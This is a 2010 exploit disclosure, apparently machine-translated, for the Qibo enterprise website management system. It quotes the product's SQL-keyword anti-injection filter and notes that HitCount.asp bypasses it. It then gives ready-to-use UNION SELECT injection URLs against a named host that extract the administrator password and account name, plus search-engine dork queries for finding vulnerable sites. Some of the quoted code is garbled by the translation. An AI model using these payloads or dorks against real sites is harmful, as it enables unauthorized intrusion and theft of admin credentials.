Qibo enterprise website management system Oday

Released on: 2010-04-19 Author: Lan3a affected version: All vulnerability Description: All programs are added with anti-injection code, in NoSql. % IfEnableStopInjectionTrueThenDimFy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstrFy_In |; | and | exec | insert | select |

Release date: 2010-04-19
Author: Lan3a
Affected Versions: All
Vulnerability description:
Programs are added with anti-injection code, in the NoSql. asp file.
<% If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbsTrFy_In = "'|; | and |ExEc | insert | select | delete | upDate| Count | * | % | chr | mId| Master | truNcAte | char | declare "Fy_Inf = Split (Fy_In," | ") If Request. FoRm<> "" Then For Each Fy_Post In Request. form For Fy_Xh = 0 To UBound (Fy_Inf) If InStr (LCase (Request. form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then Response. write "" Response. end If Next End If Request. queryString <> "" Then For Each Fy_Get In Request. queryString For Fy_Xh = 0 To UBound (Fy_Inf) If InStr (LCase (Request. queryString (Fy_Get), Fy_Inf (Fy_Xh) <> 0 Then Response. write "" Response. end Response. end If Next End If %>
The cookie is not filtered, but the program limits the integer type when passing in the variable, so I cannot.

Continue.

MemberLogin. Asp

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, SQL LoginName = Trim (request. form ("LoginName") LoginPassword = Md5 (request. form ("LoginPassword") Set rs = server. createObject ("adodb. recordSet") SQL =" select * from Qianbo_Members where MemName = '"& LoginName &"'"
Anti-injection code is not added, but it is the logon verification page. If it is an MSsql database, we can do it better.

At this time, we found in the HitCount. Asp file that the file did not call anti-injection code.

<% Dim rs, m_ SQL Dim m_ID = ReplaceBadChar (Request. queryString ("id") m_LX = ReplaceBadChar (Request. queryString ("LX") action = ReplaceBadChar (Request. queryString ("action") If action = "count" Then conn. exeCutE ("update" & m_LX & "set ClickNumberClickNumber = ClickNumber + 1 where ID =" & m_ID & "") ELsE m_ SQL = "select ClickNumber from" & m_LX & "where ID =" & m_ID Set rs = conn. Execute (m_ SQL) response. Write "document.Write("& Rs (0) &"); "rs. Close Set rs = Nothing End If %> is the file. Let's construct the injection statement.
 

As follows:

Http://blog.cfyhack.cn/hitcount.asp? Lx = Qianbo_about & id = 1% 20and % 201 = 2% 20 union % 20 select % 20 password % 20 from % 20qianbo_admin get Admin password

Http://blog.cfyhack.cn/hitcount.asp? Lx = Qianbo_about & id = 1% 20and % 201 = 2% 20 union % 20 select % 20 adminname % 20 from % 20qianbo_admin get management account

Keywords:
 

Inurl: Search. Asp? Range = ProDuCt & Keyword =
Inurl: ProductBuy. Asp? ProductNo =
 

This problem also exists on the official website.